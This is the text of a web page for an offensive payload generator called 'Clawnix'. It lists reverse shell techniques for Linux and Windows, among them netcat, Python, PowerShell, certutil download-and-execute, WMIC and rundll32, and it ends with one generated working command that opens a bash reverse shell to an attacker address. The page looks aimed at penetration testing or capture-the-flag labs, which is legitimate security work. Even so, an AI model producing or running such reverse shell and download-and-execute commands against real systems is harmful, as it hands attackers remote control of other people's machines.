Clawnix Lion Logo

Clawnix

Payload Generator made by Declan Middleton v.1

Offensive
Reverse
MSFVenom
Web Injection

Target Configuration

Shell Selection

Bash -i
beginner
linux

Interactive bash shell redirected through TCP connection

Bash 196
intermediate
linux

Uses file descriptor 196 for bidirectional communication

nc -e
beginner
linux

Direct shell execution through netcat

Python
intermediate
linux

Python-based reverse shell using socket library

PowerShell TCP
intermediate
windows

PowerShell reverse shell using TCP client

PowerShell Base64
advanced
windows

Base64 encoded PowerShell reverse shell

CMD Netcat
beginner
windows

Windows Command Prompt with netcat

Certutil Download & Execute
intermediate
windows

Download and execute payload using certutil

WMIC Process Call
advanced
windows

WMIC process creation with PowerShell download

Rundll32 JavaScript
advanced
windows

Rundll32 with JavaScript to execute PowerShell

Generated Command

🚀
bash -i >& /dev/tcp/10.10.14.20/1111 0>&1
_